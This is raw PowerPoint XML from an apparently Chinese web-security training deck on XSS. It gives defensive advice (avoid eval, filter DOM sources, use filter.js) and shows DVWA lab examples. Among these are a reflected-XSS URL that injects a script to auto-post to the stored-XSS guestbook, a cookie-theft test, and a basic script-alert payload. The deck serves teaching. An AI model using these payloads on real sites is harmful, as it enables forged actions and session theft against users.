                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>慎用危险的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eval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。需要强调的是，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>函数十分灵活，能够支持执行的字符串编码纷繁复杂。强烈建议，不到万不得已，不要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>函数处理不可控的外部数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>编写安全的函数方法，从看似“可靠”的数据源获取参数值。无论是从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，还是从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>localStorage</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Referer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Window name</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SessionStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中获取数据，都应使用安全的函数，对传入的数据做过滤后，再传递给相关函数写入页面或执行。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>参考</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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>filter.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>库 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>filter.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>由一系列针对常见业务场景下造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的恶意数据开展过滤的函数组成。其中包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VaildURL</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HtmlEncode</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HtmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等函数方法。在使用过程中，针对上面一部分提到的不同的场景需要，使用与之对应的过滤函数进行验证，才可以从根本上防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>产生。 </a:t>
            </a:r>
          </a:p>
          <a:p>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15263823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192.168.1.64/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss_r</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/?default=English&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> f1=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('form');</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(f1);f1.action='/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss_s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/';f1.method='post';</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i1=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i2=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i3=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");f1.appendChild(i1);f1.appendChild(i2);f1.appendChild(i3);i1.name='txtName';i2.name='mtxMessage';i1.value='autoname';i2.value='automess';i3.name='btnSign';i3.value='Sign+Guestbook';f1.submit();&lt;/script&gt;#</a:t>
            </a:r>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588468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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来测试盗用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1138369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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935840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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1702809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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以在存储行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>测试：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>alart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)&lt;/script&gt;</a:t>
            </a:r>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1557106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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="504599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有任意可以输入的地方（有回显，或存储内容），都可以尝试。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="幻灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4870BEF-24BB-4678-92B8-D9C03FCDED1A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351020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lgn="ctr">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5895732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9756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800523" y="274639"/>
            <a:ext cx="781877"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9902891"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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25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lgn="ctr">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3822199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342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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Ø"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 5"/>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812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ctr">
              <a:defRPr sz="40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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302411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609600" y="994892"/>
            <a:ext cx="5384800" cy="5131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6197600" y="994890"/>
            <a:ext cx="5384800" cy="51312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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 7"/>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49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980728"/>
            <a:ext cx="5386917"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1836515"/>
            <a:ext cx="5386917" cy="428964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6193368" y="980728"/>
            <a:ext cx="5389033"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1836515"/>
            <a:ext cx="5389033" cy="428964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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 9"/>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16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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 5"/>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085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39517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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1" u="none"/>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766733" y="273051"/>
            <a:ext cx="6815667" cy="5853113"/>
          </a:xfr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dirty="0"/>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331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342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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Ø"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>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3378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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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45034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688069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800523" y="274639"/>
            <a:ext cx="781877"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9902891"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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20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ctr">
              <a:defRPr sz="40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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3355885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609600" y="994892"/>
            <a:ext cx="5384800" cy="5131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994890"/>
            <a:ext cx="5384800" cy="51312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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 7"/>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91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980728"/>
            <a:ext cx="5386917"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1836515"/>
            <a:ext cx="5386917" cy="428964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980728"/>
            <a:ext cx="5389033"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1836515"/>
            <a:ext cx="5389033" cy="428964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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>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468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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>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268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08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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1" u="none"/>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766733" y="273051"/>
            <a:ext cx="6815667" cy="5853113"/>
          </a:xfr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0869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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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6895294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49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文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="980729"/>
            <a:ext cx="10972800" cy="514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028" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明LOGO.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43933" y="6381751"/>
            <a:ext cx="127154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Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/8/17 8:05 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
